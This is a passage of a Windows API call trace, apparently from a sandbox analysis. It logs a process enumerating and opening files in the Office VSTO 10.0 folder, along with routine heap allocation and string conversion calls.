Context=0x0) returned 1 [0087.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.694] AreFileApisANSI () returned 1 [0087.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0087.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c458 [0087.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0087.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.694] GetFileType (hFile=0x348) returned 0x1 [0087.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.695] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.695] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.695] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.695] CloseHandle (hObject=0x348) returned 1 [0087.695] AreFileApisANSI () returned 1 [0087.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0087.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c848 [0087.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c848, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0087.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.695] GetFileType (hFile=0x348) returned 0x1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0087.696] CloseHandle (hObject=0x348) returned 1 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.697] AreFileApisANSI () returned 1 [0087.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0087.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c7a0 [0087.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0087.697] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x5080)) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0087.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.697] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x9c, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5fdd0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x9c, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓傀")) returned 0 [0087.697] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0087.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.698] AreFileApisANSI () returned 1 [0087.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe", lpUsedDefaultChar=0x0) returned 75 [0087.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.699] AreFileApisANSI () returned 1 [0087.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85ee0 [0087.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0087.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.790] GetFileType (hFile=0x348) returned 0x1 [0087.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0087.791] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.791] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.791] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.791] CloseHandle (hObject=0x348) returned 1 [0087.791] AreFileApisANSI () returned 1 [0087.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85da0 [0087.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0087.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.792] GetFileType (hFile=0x348) returned 0x1 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0087.792] CloseHandle (hObject=0x348) returned 1 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.793] AreFileApisANSI () returned 1 [0087.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85300 [0087.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0087.793] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888)) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.794] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x59a70, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="VSTOLoader.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.794] HeapFree (in: 